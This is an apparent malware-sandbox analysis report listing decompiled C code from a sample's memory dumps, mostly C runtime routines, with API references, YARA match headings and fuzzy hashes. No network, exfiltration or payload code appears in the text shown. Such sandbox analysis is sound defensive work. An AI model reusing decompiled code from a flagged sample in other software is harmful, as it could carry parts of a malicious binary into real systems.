                              							_t91 = _t91 + 1;
                              							if(_t64 == 0) {
                              								goto L26;
                              							}
                              							_t87 = _t103 + 0x68;
                              							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                              								goto L9;
                              							}
                              							L26:
                              							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                              							if(_t65 == 0) {
                              								goto L30;
                              							} else {
                              								if(_t65 != 0x77) {
                              									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                              									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                              									 *_t93 = _t66;
                              									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                              									_t104 = _t103 + 0x14;
                              									__eflags = _t67;
                              									if(_t67 != 0) {
                              										goto L30;
                              									} else {
                              										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                              										if(__eflags == 0) {
                              											goto L30;
                              										} else {
                              											goto L34;
                              										}
                              									}
                              								} else {
                              									_push(0x38);
                              									_push("1.2.3");
                              									_push( *((intOrPtr*)(_t103 + 0x10)));
                              									_push(8);
                              									_push(0xfffffff1);
                              									_push(8);
                              									_push(_t98);
                              									_push(_t93);
                              									_t91 = E00404CE0();
                              									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                              									_t104 = _t103 + 0x24;
                              									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                              									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                              									if(_t91 != 0 || _t79 == 0) {
                              										goto L30;
                              									} else {
                              										L34:
                              										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                              										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                              										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                              										__eflags = _t69;
                              										_push(_t104 + 0x18);
                              										if(__eflags >= 0) {
                              											_push(_t69);
                              											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                              										} else {
                              											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                              											_push( *((intOrPtr*)(_t104 + 0x70)));
                              											_t70 = E0040CB9D();
                              										}
                              										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                              										__eflags = _t70;
                              										if(_t70 == 0) {
                              											goto L30;
                              										} else {
                              											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                              											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                              												E00405000(_t93, 0);
                              												_push( *((intOrPtr*)(_t93 + 0x40)));
                              												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                              												__eflags = _t74;
                              												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                              												return _t93;
                              											} else {
                              												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                              												return _t93;
                              											}
                              										}
                              									}
                              								}
                              							}
                              							goto L42;
                              							L7:
                              							_t62 =  *_t83;
                              							 *_t88 = _t62;
                              							_t83 = _t83 + 1;
                              							_t88 = _t88 + 1;
                              							if(_t62 != 0) {
                              								goto L7;
                              							} else {
                              								 *((char*)(_t93 + 0x5c)) = 0;
                              							}
                              							goto L9;
                              						}
                              					}
                              				}
                              				L42:
                              			}


































                              APIs
                              • _malloc.LIBCMT ref: 004057DE
                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                              • _malloc.LIBCMT ref: 00405842
                              • _malloc.LIBCMT ref: 00405906
                              • _malloc.LIBCMT ref: 00405930
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: _malloc$AllocateHeap
                              • String ID: 1.2.3
                              • API String ID: 680241177-2310465506
                              • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                              • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                              • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                              • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _malloc.LIBCMT ref: 00505A45
                                • Part of subcall function 0050BAB4: __FF_MSGBANNER.LIBCMT ref: 0050BAD7
                                • Part of subcall function 0050BAB4: __NMSG_WRITE.LIBCMT ref: 0050BADE
                              • _malloc.LIBCMT ref: 00505AA9
                              • _malloc.LIBCMT ref: 00505B6D
                              • _malloc.LIBCMT ref: 00505B97
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: _malloc
                              • String ID: 1.2.3
                              • API String ID: 1579825452-2310465506
                              • Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                              • Instruction ID: f00b6c14ef8bef3fc8487807d71e6ff2f716c98e7dc79c0379f03df27d440cfc
                              • Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                              • Instruction Fuzzy Hash: D661C1B1944B818FD7309F29888066FBFE0FB95710F544E2EE1D683681E775A84ACF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
                              			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                              				signed int _v8;
                              				char* _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t90;
                              				intOrPtr* _t92;
                              				signed int _t94;
                              				char _t97;
                              				signed int _t105;
                              				void* _t106;
                              				signed int _t107;
                              				signed int _t110;
                              				signed int _t113;
                              				intOrPtr* _t114;
                              				signed int _t118;
                              				signed int _t119;
                              				signed int _t120;
                              				char* _t121;
                              				signed int _t125;
                              				signed int _t131;
                              				signed int _t133;
                              				void* _t134;
                              
                              				_t125 = __edx;
                              				_t121 = _a4;
                              				_t119 = _a8;
                              				_t131 = 0;
                              				_v12 = _t121;
                              				_v8 = _t119;
                              				if(_a12 == 0 || _a16 == 0) {
                              					L5:
                              					return 0;
                              				} else {
                              					_t138 = _t121;
                              					if(_t121 != 0) {
                              						_t133 = _a20;
                              						__eflags = _t133;
                              						if(_t133 == 0) {
                              							L9:
                              							__eflags = _t119 - 0xffffffff;
                              							if(_t119 != 0xffffffff) {
                              								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                              								_t134 = _t134 + 0xc;
                              							}
                              							__eflags = _t133 - _t131;
                              							if(__eflags == 0) {
                              								goto L3;
                              							} else {
                              								_t94 = _t90 | 0xffffffff;
                              								_t125 = _t94 % _a12;
                              								__eflags = _a16 - _t94 / _a12;
                              								if(__eflags > 0) {
                              									goto L3;
                              								}
                              								L13:
                              								_t131 = _a12 * _a16;
                              								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                              								_v20 = _t131;
                              								_t120 = _t131;
                              								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                              									_v16 = 0x1000;
                              								} else {
                              									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                              								}
                              								__eflags = _t131;
                              								if(_t131 == 0) {
                              									L40:
                              									return _a16;
                              								} else {
                              									do {
                              										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                              										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                              											L24:
                              											__eflags = _t120 - _v16;
                              											if(_t120 < _v16) {
                              												_t97 = E0040FC07(_t120, _t125, _t133);
                              												__eflags = _t97 - 0xffffffff;
                              												if(_t97 == 0xffffffff) {
                              													L48:
                              													return (_t131 - _t120) / _a12;
                              												}
                              												__eflags = _v8;
                              												if(_v8 == 0) {
                              													L44:
                              													__eflags = _a8 - 0xffffffff;
                              													if(__eflags != 0) {
                              														E0040BA30(_t131, _a4, 0, _a8);
                              														_t134 = _t134 + 0xc;
                              													}
                              													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                              													_push(0);
                              													_push(0);
                              													_push(0);
                              													_push(0);
                              													_push(0);
                              													L4:
                              													E0040E744(_t125, _t131, _t133);
                              													goto L5;
                              												}
                              												_t123 = _v12;
                              												_v12 = _v12 + 1;
                              												 *_v12 = _t97;
                              												_t120 = _t120 - 1;
                              												_t70 =  &_v8;
                              												 *_t70 = _v8 - 1;
                              												__eflags =  *_t70;
                              												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                              												goto L39;
                              											}
                              											__eflags = _v16;
                              											if(_v16 == 0) {
                              												_t105 = 0x7fffffff;
                              												__eflags = _t120 - 0x7fffffff;
                              												if(_t120 <= 0x7fffffff) {
                              													_t105 = _t120;
                              												}
                              											} else {
                              												__eflags = _t120 - 0x7fffffff;
                              												if(_t120 <= 0x7fffffff) {
                              													_t55 = _t120 % _v16;
                              													__eflags = _t55;
                              													_t125 = _t55;
                              													_t110 = _t120;
                              												} else {
                              													_t125 = 0x7fffffff % _v16;
                              													_t110 = 0x7fffffff;
                              												}
                              												_t105 = _t110 - _t125;
                              											}
                              											__eflags = _t105 - _v8;
                              											if(_t105 > _v8) {
                              												goto L44;
                              											} else {
                              												_push(_t105);
                              												_push(_v12);
                              												_t106 = E0040FA20(_t125, _t131, _t133);
                              												_pop(_t123);
                              												_push(_t106);
                              												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                              												_t134 = _t134 + 0xc;
                              												__eflags = _t107;
                              												if(_t107 == 0) {
                              													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                              													goto L48;
                              												}
                              												__eflags = _t107 - 0xffffffff;
                              												if(_t107 == 0xffffffff) {
                              													L47:
                              													_t80 = _t133 + 0xc;
                              													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                              													__eflags =  *_t80;
                              													goto L48;
                              												}
                              												_v12 = _v12 + _t107;
                              												_t120 = _t120 - _t107;
                              												_v8 = _v8 - _t107;
                              												goto L39;
                              											}
                              										}
                              										_t113 =  *(_t133 + 4);
                              										__eflags = _t113;
                              										if(__eflags == 0) {
                              											goto L24;
                              										}
                              										if(__eflags < 0) {
                              											goto L47;
                              										}
                              										_t131 = _t120;
                              										__eflags = _t120 - _t113;
                              										if(_t120 >= _t113) {
                              											_t131 = _t113;
                              										}
                              										__eflags = _t131 - _v8;
                              										if(_t131 > _v8) {
                              											_t133 = 0;
                              											__eflags = _a8 - 0xffffffff;
                              											if(__eflags != 0) {
                              												E0040BA30(_t131, _a4, 0, _a8);
                              												_t134 = _t134 + 0xc;
                              											}
                              											_t114 = E0040BFC1(__eflags);
                              											_push(_t133);
                              											_push(_t133);
                              											_push(_t133);
                              											_push(_t133);
                              											 *_t114 = 0x22;
                              											_push(_t133);
                              											goto L4;
                              										} else {
                              											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                              											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                              											 *_t133 =  *_t133 + _t131;
                              											_v12 = _v12 + _t131;
                              											_t120 = _t120 - _t131;
                              											_t134 = _t134 + 0x10;
                              											_v8 = _v8 - _t131;
                              											_t131 = _v20;
                              										}
                              										L39:
                              										__eflags = _t120;
                              									} while (_t120 != 0);
                              									goto L40;
                              								}
                              							}
                              						}
                              						_t118 = _t90 | 0xffffffff;
                              						_t90 = _t118 / _a12;
                              						_t125 = _t118 % _a12;
                              						__eflags = _a16 - _t90;
                              						if(_a16 <= _t90) {
                              							goto L13;
                              						}
                              						goto L9;
                              					}
                              					L3:
                              					_t92 = E0040BFC1(_t138);
                              					_push(_t131);
                              					_push(_t131);
                              					_push(_t131);
                              					_push(_t131);
                              					 *_t92 = 0x16;
                              					_push(_t131);
                              					goto L4;
                              				}
                              			}


                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                              • String ID:
                              • API String ID: 3886058894-0
                              • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                              • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                              • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                              • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                              • String ID:
                              • API String ID: 3886058894-0
                              • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                              • Instruction ID: 156f7c7a55712f4a3eafccf25a6226955b65ad37cc6fca5e373cfcbf97ae1ec8
                              • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                              • Instruction Fuzzy Hash: 1F51C371A0020AEBEB209F698C8859EBFB5FF82360F248729F825971D1D7719E51DF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __fileno$__getptd_noexit__lock_file
                              • String ID: 'B
                              • API String ID: 3755561058-2787509829
                              • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                              • Instruction ID: 82c9c252779995b0bd5845369259982ac03466f9a4e976445ee76e83448cda30
                              • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                              • Instruction Fuzzy Hash: D501663360461966C2216B786C4B42D7FA0BFC7B303368B14F0709B1D2EB28ED029295
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 90%
                              			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                              				signed int _t13;
                              				intOrPtr _t28;
                              				void* _t29;
                              				void* _t30;
                              
                              				_t30 = __eflags;
                              				_t26 = __edi;
                              				_t25 = __edx;
                              				_t22 = __ebx;
                              				_push(0xc);
                              				_push(0x4214d0);
                              				E0040E1D8(__ebx, __edi, __esi);
                              				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                              				_t13 =  *0x422e34; // 0xfffffffe
                              				if(( *(_t28 + 0x70) & _t13) == 0) {
                              					L6:
                              					E0040D6E0(_t22, 0xc);
                              					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                              					_t8 = _t28 + 0x6c; // 0x6c
                              					_t26 =  *0x422f18; // 0x422e40
                              					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                              					 *(_t29 - 4) = 0xfffffffe;
                              					E004147A2();
                              				} else {
                              					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                              					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                              						goto L6;
                              					} else {
                              						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                              					}
                              				}
                              				if(_t28 == 0) {
                              					E0040E79A(_t25, _t26, 0x20);
                              				}
                              				return E0040E21D(_t28);
                              			}


                              APIs
                              • __getptd.LIBCMT ref: 00414744
                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                              • __getptd.LIBCMT ref: 0041475B
                              • __amsg_exit.LIBCMT ref: 00414769
                              • __lock.LIBCMT ref: 00414779
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                              • String ID: @.B
                              • API String ID: 3521780317-470711618
                              • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                              • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                              • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                              • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __getptd.LIBCMT ref: 005149AB
                                • Part of subcall function 0051099C: __getptd_noexit.LIBCMT ref: 0051099F
                                • Part of subcall function 0051099C: __amsg_exit.LIBCMT ref: 005109AC
                              • __getptd.LIBCMT ref: 005149C2
                              • __amsg_exit.LIBCMT ref: 005149D0
                              • __lock.LIBCMT ref: 005149E0
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                              • String ID: @.B
                              • API String ID: 3521780317-470711618
                              • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                              • Instruction ID: dcec378ed9d6efa4e25ba5d66deb9f56fb7a5a5a75655b24d5d5cf423d5fce63
                              • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                              • Instruction Fuzzy Hash: 4FF09031A407169BFB20FBB4890B7EE7BA07F80720F51191AE454A72D2CB74A881CF95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ___addlocaleref.LIBCMT ref: 00514973
                              • ___removelocaleref.LIBCMT ref: 0051497E
                              • ___freetlocinfo.LIBCMT ref: 00514992
                                • Part of subcall function 005146F0: ___free_lconv_mon.LIBCMT ref: 00514736
                                • Part of subcall function 005146F0: ___free_lconv_num.LIBCMT ref: 00514757
                                • Part of subcall function 005146F0: ___free_lc_time.LIBCMT ref: 005147DC
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                              • String ID: @.B$@.B
                              • API String ID: 4212647719-183327057
                              • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                              • Instruction ID: 1222d49adb0acbd4d095fcd2807a0c6f45d8dd0c38fa2a57cbb590ff0e7d76e7
                              • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                              • Instruction Fuzzy Hash: 14E0DF32521A2295AA312A1CE8002EF9E943FC2312B1B312AF808EB045DB248CC08CA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                              				intOrPtr _v8;
                              				void* _t16;
                              				void* _t17;
                              				intOrPtr _t19;
                              				void* _t21;
                              				signed int _t22;
                              				intOrPtr* _t27;
                              				intOrPtr _t39;
                              				intOrPtr _t40;
                              				intOrPtr _t50;
                              
                              				_t37 = __edx;
                              				_push(8);
                              				_push(0x421140);
                              				E0040E1D8(__ebx, __edi, __esi);
                              				_t39 = _a4;
                              				_t50 = _t39;
                              				_t51 = _t50 != 0;
                              				if(_t50 != 0) {
                              					E0040FB29(_t39);
                              					_v8 = 0;
                              					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                              					_t16 = E0040FA20(__edx, _t39, _t39);
                              					__eflags = _t16 - 0xffffffff;
                              					if(_t16 == 0xffffffff) {
                              						L6:
                              						_t17 = 0x4227e0;
                              					} else {
                              						_t21 = E0040FA20(__edx, _t39, _t39);
                              						__eflags = _t21 - 0xfffffffe;
                              						if(_t21 == 0xfffffffe) {
                              							goto L6;
                              						} else {
                              							_t22 = E0040FA20(__edx, _t39, _t39);
                              							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                              						}
                              					}
                              					_t9 = _t17 + 4; // 0xa80
                              					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                              					_v8 = 0xfffffffe;
                              					E0040C735(_t39);
                              					_t19 = 0;
                              					__eflags = 0;
                              				} else {
                              					_t27 = E0040BFC1(_t51);
                              					_t40 = 0x16;
                              					 *_t27 = _t40;
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					E0040E744(__edx, _t40, 0);
                              					_t19 = _t40;
                              				}
                              				return E0040E21D(_t19);
                              			}














                              APIs
                              • __lock_file.LIBCMT ref: 0040C6C8
                              • __fileno.LIBCMT ref: 0040C6D6
                              • __fileno.LIBCMT ref: 0040C6E2
                              • __fileno.LIBCMT ref: 0040C6EE
                              • __fileno.LIBCMT ref: 0040C6FE
                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                              • String ID:
                              • API String ID: 2805327698-0
                              • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                              • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                              • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                              • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                              				signed int _t15;
                              				LONG* _t21;
                              				long _t23;
                              				void* _t31;
                              				LONG* _t33;
                              				void* _t34;
                              				void* _t35;
                              
                              				_t35 = __eflags;
                              				_t29 = __edx;
                              				_t25 = __ebx;
                              				_push(0xc);
                              				_push(0x421490);
                              				E0040E1D8(__ebx, __edi, __esi);
                              				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                              				_t15 =  *0x422e34; // 0xfffffffe
                              				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                              					E0040D6E0(_t25, 0xd);
                              					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                              					_t33 =  *(_t31 + 0x68);
                              					 *(_t34 - 0x1c) = _t33;
                              					__eflags = _t33 -  *0x422d38; // 0x1fd1638
                              					if(__eflags != 0) {
                              						__eflags = _t33;
                              						if(_t33 != 0) {
                              							_t23 = InterlockedDecrement(_t33);
                              							__eflags = _t23;
                              							if(_t23 == 0) {
                              								__eflags = _t33 - 0x422910;
                              								if(__eflags != 0) {
                              									_push(_t33);
                              									E0040B6B5(_t25, _t31, _t33, __eflags);
                              								}
                              							}
                              						}
                              						_t21 =  *0x422d38; // 0x1fd1638
                              						 *(_t31 + 0x68) = _t21;
                              						_t33 =  *0x422d38; // 0x1fd1638
                              						 *(_t34 - 0x1c) = _t33;
                              						InterlockedIncrement(_t33);
                              					}
                              					 *(_t34 - 4) = 0xfffffffe;
                              					E00414067();
                              				} else {
                              					_t33 =  *(_t31 + 0x68);
                              				}
                              				if(_t33 == 0) {
                              					E0040E79A(_t29, _t31, 0x20);
                              				}
                              				return E0040E21D(_t33);
                              			}











                              APIs
                              • __getptd.LIBCMT ref: 00413FD8
                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                              • __amsg_exit.LIBCMT ref: 00413FF8
                              • __lock.LIBCMT ref: 00414008
                              • InterlockedDecrement.KERNEL32(?), ref: 00414025
                              • InterlockedIncrement.KERNEL32(01FD1638), ref: 00414050
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                              • String ID:
                              • API String ID: 4271482742-0
                              • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                              • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                              • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                              • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __getptd.LIBCMT ref: 0051423F
                                • Part of subcall function 0051099C: __getptd_noexit.LIBCMT ref: 0051099F
                                • Part of subcall function 0051099C: __amsg_exit.LIBCMT ref: 005109AC
                              • __amsg_exit.LIBCMT ref: 0051425F
                              • __lock.LIBCMT ref: 0051426F
                              • InterlockedDecrement.KERNEL32(?), ref: 0051428C
                              • InterlockedIncrement.KERNEL32(00422D38), ref: 005142B7
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                              • String ID:
                              • API String ID: 4271482742-0
                              • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                              • Instruction ID: 29d04ea5ad976c42c986b780625f30dc3ba3deee93aaa7401a0522954d630e2a
                              • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                              • Instruction Fuzzy Hash: C401C435A01622ABEB21AB64980A7EEBF60BF84720F541415FC30A72D1C77469C2CFD9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $2$l
                              • API String ID: 0-3132104027
